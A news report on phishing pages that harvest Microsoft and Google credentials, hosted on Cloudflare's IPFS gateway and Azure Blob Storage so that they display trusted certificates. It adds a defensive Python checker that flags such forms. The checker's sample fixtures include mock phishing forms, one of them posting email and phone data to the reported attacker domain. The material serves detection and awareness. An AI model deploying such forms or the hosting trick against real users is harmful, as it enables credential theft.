Phishing Forms Found Behind Cloudflare and Microsoft Certificates – Lawrence Abrams, founder of BleepingComputer (bleepingcomputer.com), discovered phishing forms that harvest Microsoft and Google account credentials and are served over connections secured by Cloudflare's own TLS certificate. The attackers created them using a service that Cloudflare itself provides.
Cloudflare recently introduced an IPFS gateway that makes content stored in the IPFS distributed file system reachable from an ordinary browser. Every connection to the gateway is protected by TLS with a certificate issued to Cloudflare. The attackers uploaded an HTML document to IPFS and used the gateway to present it to their victims. Seeing a form displayed under the security certificate of a well-known company, a user may conclude that the form is genuine and fall for it.
When a user submits the form, the phone number and email address entered are sent to an attacker-controlled page on searchurl.bid, after which a random PDF with text about business strategies is displayed as a decoy.
The same attackers are involved in many other phishing schemes. Using VirusTotal, the BleepingComputer authors searched for URLs associated with the searchurl.bid domain and found many pages with phishing forms. Some of them are still active and display login forms imitating Google, Windows, DocuSign and other accounts. Although the addresses of these pages look extremely suspicious, many people in a hurry will enter and submit their data regardless.
A phishing attack using a form hosted in Azure Blob Storage was described earlier. The attackers sent spam with attached PDF files that allegedly contained scanned documents from a law firm.
Clicking the link to download the PDF takes the user to a login page for Microsoft 365 services. That page is hosted at https://onedriveunbound80343.blob.core.windows.net in Azure Blob Storage. The storage account can be reached over both HTTP and HTTPS, and in the latter case the browser shows a TLS certificate belonging to Microsoft.
Since this attack targets logins for Office 365, Azure AD and other Microsoft services, such a certificate is a genuine asset to the attacker. Even a cautious user who checks who the certificate was issued to can be deceived on seeing Microsoft there. The one thing that should stop a person is the unusual URL of the fake login page: a certificate only proves that the connection to the host named in the address bar is encrypted, and that host here is a shared storage platform on which any customer can upload a page, not Microsoft's own sign-in service.
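The two cases above share a pattern: a credential form served from a shared hosting platform whose certificate belongs to the platform, and (in the IPFS case) a form that submits to a third domain. The following is an added example, not code from the BleepingComputer report or from the attackers' pages: it parses a page's forms and raises a warning for either pattern. It runs offline on constructed sample HTML. The platform list, the IPFS hash placeholder, the form-action paths and the field names are assumptions; only the hostnames cloudflare-ipfs.com, searchurl.bid and onedriveunbound80343.blob.core.windows.net come from the article.

```python
# Added example (not from the BleepingComputer report): two checks a
# defender can apply to a page that shows a login form under a
# trusted-looking certificate. Runs offline on constructed HTML.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosting platforms where every tenant is served under the platform's own
# certificate, so the certificate says nothing about who uploaded the page.
# Assumption: a starting list; extend it for your environment.
SHARED_CERT_PLATFORMS = ("cloudflare-ipfs.com", "blob.core.windows.net")

# Input types that indicate a form is asking for credentials or contact data.
CREDENTIAL_INPUT_TYPES = {"password", "email", "tel"}


class FormCollector(HTMLParser):
    """Collects each <form>'s action URL and the types of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "types": set()}
        elif tag == "input" and self._current is not None:
            self._current["types"].add(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def on_shared_platform(host):
    return any(host == p or host.endswith("." + p) for p in SHARED_CERT_PLATFORMS)


def assess_page(page_url, html):
    """Return the set of warning codes raised for credential forms on the page."""
    parser = FormCollector()
    parser.feed(html)
    page_host = host_of(page_url)
    warnings = set()
    for form in parser.forms:
        if not form["types"] & CREDENTIAL_INPUT_TYPES:
            continue  # not asking for credentials or contact details
        # A valid certificate for a shared platform only proves you reached
        # the platform; any tenant can upload a Microsoft- or Google-styled form.
        if on_shared_platform(page_host):
            warnings.add("credential-form-on-shared-platform")
        # The form submits to a host other than the one serving the page
        # (an empty action resolves to the page URL itself).
        action_host = host_of(urljoin(page_url, form["action"]))
        if action_host != page_host:
            warnings.add("posts-to-third-party-host")
    return warnings


# Constructed sample pages modelled on the two cases in the report.
# The IPFS hash, the form-action paths and field names are placeholders.
IPFS_PAGE_URL = "https://cloudflare-ipfs.com/ipfs/QmPlaceholderHash/index.html"
IPFS_PAGE_HTML = """
<html><body>
<form method="post" action="https://searchurl.bid/collect.php">
  <input type="email" name="email">
  <input type="tel" name="phone">
  <input type="submit" value="View document">
</form>
</body></html>
"""

AZURE_PAGE_URL = "https://onedriveunbound80343.blob.core.windows.net/docs/login.html"
AZURE_PAGE_HTML = """
<html><body>
<form method="post" action="login.php">
  <input type="email" name="loginfmt">
  <input type="password" name="passwd">
</form>
</body></html>
"""

# A first-party sign-in page for comparison (example.com is a reserved name).
LEGIT_PAGE_URL = "https://login.example.com/"
LEGIT_PAGE_HTML = """
<form method="post" action="/session">
  <input type="email" name="user"><input type="password" name="pw">
</form>
"""

if __name__ == "__main__":
    for url, html in ((IPFS_PAGE_URL, IPFS_PAGE_HTML),
                      (AZURE_PAGE_URL, AZURE_PAGE_HTML),
                      (LEGIT_PAGE_URL, LEGIT_PAGE_HTML)):
        print(url, sorted(assess_page(url, html)) or ["no warnings"])
```

Hosting on an IPFS gateway or in blob storage is common and legitimate, so the first warning is a signal for review rather than a verdict; the second, a credential form posting to an unrelated domain, is far rarer on genuine sign-in pages. The manual equivalent of both checks is the one the article recommends: compare the host in the address bar with the sign-in host you expect, rather than stopping at the padlock.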